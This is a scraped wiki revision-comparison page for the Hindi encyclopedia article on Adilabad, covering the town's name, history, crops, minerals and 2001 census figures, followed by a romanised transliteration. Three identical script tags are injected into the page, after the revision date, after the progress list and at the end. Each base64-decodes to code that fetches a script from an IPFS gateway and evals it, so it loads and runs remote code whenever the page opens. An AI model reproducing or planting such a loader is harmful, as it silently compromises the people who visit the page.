Difference between revisions of "आदिलाबाद"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 2: Line 2:
 
भूतपूर्व अदलाबाद, नगर उत्तरी [[आंध्र प्रदेश]] [[भारत]] में स्थित है। [[हैदराबाद]] से 260 किलोमीटर उत्तर में [[वाराणसी]]-[[कन्याकुमारी]] राष्ट्रीय राजमार्ग के [[नागपुर]]-हैदराबाद खंड पर स्थित यह नगर एक कृषि व्यापार केंद्र है।  
 
भूतपूर्व अदलाबाद, नगर उत्तरी [[आंध्र प्रदेश]] [[भारत]] में स्थित है। [[हैदराबाद]] से 260 किलोमीटर उत्तर में [[वाराणसी]]-[[कन्याकुमारी]] राष्ट्रीय राजमार्ग के [[नागपुर]]-हैदराबाद खंड पर स्थित यह नगर एक कृषि व्यापार केंद्र है।  
 
==नगर का नाम==
 
==नगर का नाम==
आदिलाबाद नगर का नाम [[बीजापुर]] के बहमनी सुल्तान आदिलशाह के नाम पर है। यह आदिलशाह [[शिवाजी]] का समकालीन था।  
+
आदिलाबाद नगर का नाम [[बीजापुर]] के [[बहमनी राजवंश|बहमनी सुल्तान]] आदिलशाह के नाम पर है। यह आदिलशाह [[शिवाजी]] का समकालीन था।  
 
==इतिहास==
 
==इतिहास==
आदिलाबाद के निकट ही माहुर ([[महाराष्ट्र]] राज्य) में [[बहमनी राज्य]] और ईमादशाही राजवंश के समय (14 वीं-16वीं सदी) का एक क़िला है। आदिलावाद [[गोदावरी नदी|गोदावरी]] और पेनगंगा नदियों के बीच 600 मीटर ऊंचे वनाच्छादित पठार पर स्थित है। इस क्षेत्र में टीक और आबनूस की व्यावसायिक स्तर पर कटाई होती है।  
+
आदिलाबाद के निकट ही माहुर, [[महाराष्ट्र]] राज्य में [[बहमनी राज्य]] और '''ईमादशाही राजवंश''' के समय<ref>14 वीं-16वीं सदी</ref> का एक [[क़िला]] है। आदिलाबाद [[गोदावरी नदी|गोदावरी]] और [[पेनगंगा नदी|पेनगंगा नदियों]] के बीच 600 मीटर ऊंचे वनाच्छादित पठार पर स्थित है। इस क्षेत्र में टीक और आबनूस की व्यावसायिक स्तर पर कटाई होती है।  
 
==कृषि और खनिज==
 
==कृषि और खनिज==
क्षेत्रीय अर्थव्यवस्था में [[कृषि]] और खनन का महत्त्वपूर्ण स्थान है। [[चावल]], ज्वार और [[गेहूँ]] यहाँ की प्रमुख फ़सलें हैं तथा यहाँ कोयला, अभ्रक और चूना-पत्थर का खनन होता है।  
+
क्षेत्रीय अर्थव्यवस्था में [[कृषि]] और खनन का महत्त्वपूर्ण स्थान है। [[चावल]], [[ज्वार]] और [[गेहूँ]] यहाँ की प्रमुख फ़सलें हैं तथा यहाँ [[कोयला]], [[अभ्रक]] और चूना-पत्थर का खनन होता है।  
 
==जनसंख्या==
 
==जनसंख्या==
 
[[2001]] की जनगणना के अनुसार आदिलाबाद की कुल जनसंख्या 1,08,233 है; और ज़िले की कुल जनसंख्या 24,79,347 है।
 
[[2001]] की जनगणना के अनुसार आदिलाबाद की कुल जनसंख्या 1,08,233 है; और ज़िले की कुल जनसंख्या 24,79,347 है।

Revision as of 12:05, 4 May 2018

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

bhootapoorv adalabad, nagar uttari aandhr pradesh bharat mean sthit hai. haidarabad se 260 kilomitar uttar mean varanasi-kanyakumari rashtriy rajamarg ke nagapur-haidarabad khand par sthit yah nagar ek krishi vyapar keandr hai.

nagar ka nam

adilabad nagar ka nam bijapur ke bahamani sultan adilashah ke nam par hai. yah adilashah shivaji ka samakalin tha.

itihas

adilabad ke nikat hi mahur, maharashtr rajy mean bahamani rajy aur eemadashahi rajavansh ke samay[1] ka ek qila hai. adilabad godavari aur penaganga nadiyoan ke bich 600 mitar ooanche vanachchhadit pathar par sthit hai. is kshetr mean tik aur abanoos ki vyavasayik star par kataee hoti hai.

krishi aur khanij

kshetriy arthavyavastha mean krishi aur khanan ka mahattvapoorn sthan hai. chaval, jvar aur gehooan yahaan ki pramukh fasalean haian tatha yahaan koyala, abhrak aur choona-patthar ka khanan hota hai.

janasankhya

2001 ki janaganana ke anusar adilabad ki kul janasankhya 1,08,233 hai; aur zile ki kul janasankhya 24,79,347 hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. 14 vian-16vian sadi

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>